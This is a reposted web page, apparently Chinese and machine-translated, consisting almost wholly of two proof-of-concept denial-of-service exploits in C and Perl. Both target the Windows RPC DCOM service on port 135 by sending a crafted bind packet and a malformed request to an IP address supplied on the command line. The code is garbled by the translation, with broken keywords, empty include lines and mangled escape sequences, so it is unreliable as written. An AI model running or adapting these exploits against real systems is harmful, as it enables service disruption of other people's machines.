Insider of impact wave virus (2)

zhaozj2021-02-08  394

Attachment

Test code

#include

#include

#include

#include

#include

#include

Unsigned char bindstr [] = {

0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x7f, 0x00, 0x00, 0x00,

0xD0, 0x16, 0x00, 0x16, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,

0xA0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,

0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0x11, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,

0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00};

UNSIGNED Char Request [] = {

0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00,

0x90, 0x00, 0x00, 0x00, 0x01, 0x00, 0x03, 0x00, 0x05, 0x00, 0x06, 0x01, 0x00, 0x00, 0x00, 0x00,

0x31, 0x31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31,

0x31, 0x31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};

Void main (int Argc, char ** argv)

{

Wsadata wsadata;

INT I;

Socket sock;

SockAddr_in addr_in;

Short port = 135;

UNSIGNED Char BUF1 [0x1000];

Printf ("RPC DCOM DOS Vulnerability Discoveried By Xfocus.org/N");

Printf ("Code by Flashsky, Flashsky @ Xfocus.org, Benjurry, Benjurry @ xfocus.org / n");

Printf ("Welcome to http://www.xfocus.net/n");

IF (Argc <2)

{

Printf ("Useage:% s Target / N", Argv [0]);

Exit (1);

}

IF (WsaStartup (MakeWord (2,0), & WSADATA)! = 0)

{

Printf ("WSAStartup Error.Error:% D / N", WsageTlasterror ());

Return;

}

Addr_in.sin_family = af_INet;

Addr_in.sin_port = htons (port);

Addr_in.sin_addr.s_un.s_addr = inet_addr (Argv [1]);

IF ((Sock = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) == Invalid_socket

{

Printf ("socket failed.error:% d / n", wsagetlasterror ());

Return;

}

IF (Wsaconnect (STRUCKADDR *) & addr_in, sizeof (addr_in), null, null, null, null) == Socket_ERROR) {

Printf ("Connect Failed. Error:% D", Wsagetlasterror ());

Return;

}

IF (SOND (SOCK, BINDSTR, SIZEOF (BINDSTR), 0) == Socket_ERROR)

{

Printf ("Send Failed. Error:% D / N", Wsagetlasterror ());

Return;

}

i = Recv (SOCK, BUF1, 1024, MSG_PEEK);

IF (SOND (SOCK, REQUEST, SIZEOF (Request), 0) == Socket_ERROR)

{

Printf ("Send Failed. Error:% D / N", Wsagetlasterror ());

Return;

}

i = Recv (SOCK, BUF1, 1024, MSG_PEEK);

}

#! / usr / bin / perl -w

# By Securiteam's Experts

MY $ BINDSTR = "/ x05 / x00 / x00 / x00 / x00 / x48 / x00 / x00 / x00 / xd0 / x16 / xd0 / x16 / x00 / x00 / X00 / x00 / x01 / x00 / x00 / x00 / x00 / xa0 / x01 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / X46 / X00 / X00 / X00 / X00 / X04 / XEB / X1C / XC9 / X11 / X9F / XE8 / X08 / X00 / X00 / X02 / X00 / X00 / X00 " ;

MY $ request = "/ x05 / x00 / x00 / x00 / x00 / x48 / x00 / x00 / x00 / x90 / x00 / x00 / x00 / x01 / x00 / X03 / X00 / X05 / X00 / X00 / X00 / X00 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X00 / X00 / X00 / X00 " ;

Use socket;

$ proto = getProtobyname ('TCP');

Socket (S, PF_INET, SOCK_STREAM, $ Proto) || DIE ("socket problem / n");

$ Ip = $ argv [0];

$ TARGET = INET_AON ($ IP);

$ Paddr = SockAddr_in (135, $ ​​Target);

Connect (S, $ PADDR) || DIE "Connect: $!";

SELECT (S); $ | = 1;

Print $ bindstr;

Sleep (2);

Print $ Request;

Sleep (2);

SELECT (STDOUT);

Close (s);

转载请注明原文地址:https://www.9cbs.com/read-940.html

New Post(0)